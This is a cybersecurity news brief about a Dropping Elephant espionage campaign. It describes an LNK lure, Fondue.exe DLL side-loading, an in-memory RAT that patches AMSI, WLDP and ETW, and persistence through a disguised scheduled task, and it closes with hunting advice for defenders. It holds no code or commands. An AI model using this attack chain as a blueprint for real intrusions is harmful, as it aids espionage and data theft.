What happened
The threat actor known as Dropping Elephant has returned with a refined campaign that uses a China-themed lure document to deliver a reworked remote access trojan onto victim machines.
The campaign begins with a malicious Windows shortcut file named GRES3001.lnk. The file is disguised as a PDF related to an industrial energy contract. When opened, it launches a PowerShell script that downloads additional malware from a staging server while showing the victim a decoy document about a GRES-3 seawater pump contract.
Researchers from Rapid7 identified overlaps with earlier Dropping Elephant activity, including delivery patterns, screenshot logic, beaconing behavior, and command-handler structure.
The downloaded files include a legitimate Microsoft binary, Fondue.exe, which is abused to side-load a malicious loader disguised as APPWIZ.cpl. That loader decrypts an encrypted file named editor.dat and passes the result to a Donut shellcode loader.
The final RAT is mapped directly into memory without being written to disk. This memory-resident approach helps the malware avoid traditional file-based detection.
Once active, the RAT fingerprints the victim machine and connects to a command-and-control server over encrypted HTTPS traffic on port 443. It checks in every 10 seconds and can run commands, list files, capture screenshots, upload files, and download additional tools.
For persistence, the PowerShell script stages files in the C:\Users\Public folder and creates a scheduled task named GoogleErrorReport. The task is configured to run Fondue.exe every minute, repeatedly triggering the DLL side-loading chain that loads the RAT into memory.
The scheduled task name appears designed to blend in with normal system activity. After creating the task, the script deletes the original shortcut file, removing the most visible trace of the initial infection.
The RAT also includes advanced evasion and anti-analysis capabilities. It uses control-flow flattening, checks for debugger and sandbox-related processes, resolves API functions at runtime, and patches Windows security features such as AMSI, WLDP, and ETW before executing its payload.
Before connecting to its command-and-control server, the malware checks internet connectivity and collects the host’s public IP address and country. Its communications are encrypted with Salsa20 and wrapped in Base64 encoding.
Who is affected
Organizations targeted by Dropping Elephant are affected, especially users who receive and open malicious shortcut files disguised as business documents.
Windows environments are directly exposed because the campaign uses Windows shortcut files, PowerShell, scheduled tasks, DLL side-loading, and Microsoft binaries to execute and persist.
The lure document’s industrial energy contract theme suggests risk for organizations that may receive energy, infrastructure, industrial, or procurement-related documents. However, the attack chain could be adapted for other themes.
Any endpoint where the GoogleErrorReport scheduled task is present and running binaries from public user folders should be treated as potentially compromised.
Why CISOs should care
This campaign shows how attackers are combining simple social engineering with stealthier execution and persistence techniques. The initial lure is a disguised shortcut file, but the follow-on activity uses DLL side-loading, in-memory execution, scheduled tasks, and security control tampering.
For CISOs, the scheduled task is especially important because it creates a clear behavioral detection opportunity. A task named GoogleErrorReport running every minute from a public user directory should stand out in enterprise telemetry.
The attack also reinforces the need to monitor trusted binaries and native Windows tools. Fondue.exe is a legitimate Microsoft binary, but in this campaign it is abused as part of the DLL side-loading chain. PowerShell and scheduled tasks are also used for execution and persistence.
The RAT’s capabilities make the compromise significant. Command execution, file listing, screenshot capture, file upload, and tool download functions can support espionage, lateral movement, data theft, and broader intrusion activity.
3 practical actions
- Hunt for the GoogleErrorReport scheduled task: The campaign creates a scheduled task with this name and uses it to run Fondue.exe every minute. Security teams should search endpoints for this task, especially when it runs binaries from C:\Users\Public or other unusual locations.
- Monitor shortcut files spawning PowerShell: The attack begins with a malicious LNK file disguised as a PDF. CISOs should alert on shortcut files launching PowerShell, downloading remote content, staging files in public folders, or deleting the original shortcut after execution.
- Review endpoint coverage for in-memory payloads and security control tampering: The RAT loads directly into memory and patches controls such as AMSI, WLDP, and ETW. Security teams should ensure endpoint tools can detect suspicious in-memory execution, DLL side-loading, and process tampering behavior rather than relying only on static file indicators.
John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business targeted for professional audiences.